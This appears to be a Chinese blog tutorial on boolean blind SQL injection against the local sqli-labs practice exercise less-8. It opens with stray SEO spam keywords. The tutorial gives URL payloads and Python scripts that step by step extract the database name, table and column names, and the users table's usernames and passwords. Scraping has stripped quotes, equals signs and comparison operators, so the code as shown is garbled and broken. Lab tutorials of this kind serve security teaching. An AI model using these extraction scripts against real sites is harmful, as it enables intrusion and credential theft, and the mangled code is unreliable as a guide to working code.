网站营销特点,靖江网站建设价格,wordpress unik汉化版,俄罗斯乌克兰最新局势目录 1、布尔盲注
2、布尔盲注的流程#xff08;以靶场less-8为例#xff09;
2.1输入id尝试是否存在注入点
2.1.1通过以上尝试#xff0c;联想到可能是布尔盲注
2.2猜测数据库长度
2.3获取数据库名
2.3.1python脚本获取
代码#xff1a;
获取结果为#xff1a;
…目录 1、布尔盲注
2、布尔盲注的流程以靶场less-8为例
2.1输入id尝试是否存在注入点
2.1.1通过以上尝试联想到可能是布尔盲注
2.2猜测数据库长度
2.3获取数据库名
2.3.1python脚本获取
代码
获取结果为
2.4获取表名
2.4.1count() 函数获取表名长度
2.4.2获取表名
代码
结果
2.5获取字段名
代码
结果
获取数据 1、布尔盲注 布尔盲注就是在SQL注入过程中SQL语句执行后查询到的数据不能回显到前端页面布尔盲注通常是由于开发者将报错信息屏蔽而导致的但是网页中真和假有着不同的回显比如为真时返回access为假时返回false或者为真时返回正常页面为假时跳转到错误页面等。不需要返回结果仅判断语句是否正常执行。
2、布尔盲注的流程以靶场less-8为例
2.1输入id尝试是否存在注入点 输入id1后显示为下图 输入id1 后显示与上方不同存在注入点 判断一下字段数?id1’ order by 3 --显示You are in… 尝试显示报错位?id1 union select 1,2,3 --仍然为You are in… 2.1.1通过以上尝试联想到可能是布尔盲注
2.2猜测数据库长度 确定数据库长度为8。
2.3获取数据库名 通过截取字符串的方式。函数substr(string, start, length) 截取字符串这个函数用来截取一个字符串从start位可以是第1位、第2位、第3位以此类推。每次截取length个字符。然后使用ascii()函数。其作用是将字符转换成对应的ascii值。
?id1 and ascii(substr(database(),1,1))97-- 如上图所示如果数据库名的第一个字符的ascii码值等于97则页面显示正确的页面如果数据库名的第一个字符的ascii码值不等于97则页面显示错误的页面可以通过这种方式获取到数据库名但效率过于低下所以我们使用脚本来获取数据库名。
2.3.1python脚本获取 使用下列代码就可以获取到数据库名
代码
import timeimport requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef inject_database(url):name for i in range(1, 20):for j in range(32, 129):payload 1 and ascii(substr(database(), %d, 1)) %d-- % (i, j)res {id: payload}r requests.get(url, paramsres)if You are in........... in r.text:name name chr(j)print(name)breakelse:continueinject_database(url)
获取结果为 2.4获取表名
2.4.1count() 函数获取表名长度
?id1 and (ascii(substr((select table_name from information_schema.tables where table_schemadatabase()limit 0,1),1,1)))101 -- 由上图可见看出security下有四张表
2.4.2获取表名 利用下面的python脚本就可以获取到所有的表名
代码
import requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef boolean_blind_inject(url):name for i in range(1, 50):low 32high 128while low high:mid (low high) // 2# 构造布尔盲注的payloadpayload 1 and ascii(substr((select group_concat(table_name) from information_schema.tables where table_schemasecurity),%d,1)) %d-- %(i, mid)params {id: payload} # 发送 GET 请求r requests.get(url, paramsparams)if You are in........... in r.text:low mid 1else:high midmid (low high) // 2if mid 32: breakname chr(mid)print(name)boolean_blind_inject(url)
结果 2.5获取字段名 利用表名可以获取到用户的账户和密码在users表中使用上面python脚本来获取字段名需要将刚才的python脚本中payload的内容换一下。
代码
import requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef boolean_blind_inject(url):name for i in range(1, 50):low 32high 128while low high:mid (low high) // 2# 构造布尔盲注的payloadpayload 1 and ascii(substr((select group_concat(column_name) from information_schema.columns where table_schemasecurity and table_nameusers),%d,1)) %d-- %(i, mid)params {id: payload} # 使用 params 而不是 data# 发送 GET 请求r requests.get(url, paramsparams)# 根据页面内容或状态码判断是否注入成功if You are in........... in r.text:low mid 1else:high midmid (low high) // 2if mid 32: # 如果 mid 为 32则表示已经到达字符串的末尾breakname chr(mid)print(name)# 调用函数
boolean_blind_inject(url)
结果 获取数据
import requestsurl http://127.0.0.1/sqli-labs-master/less-8/index.phpdef boolean_blind_inject(url):name for i in range(1, 200):low 32high 128while low high:mid (low high) // 2# 构造布尔盲注的payloadpayload 1 and ascii(substr((select group_concat(username,id,password) from users),%d,1)) %d-- %(i, mid)params {id: payload} # 使用 params 而不是 data# 发送 GET 请求r requests.get(url, paramsparams)# 根据页面内容或状态码判断是否注入成功if You are in........... in r.text:low mid 1else:high midmid (low high) // 2if mid 32: # 如果 mid 为 32则表示已经到达字符串的末尾breakname chr(mid)print(name)# 调用函数
boolean_blind_inject(url) ok完成。
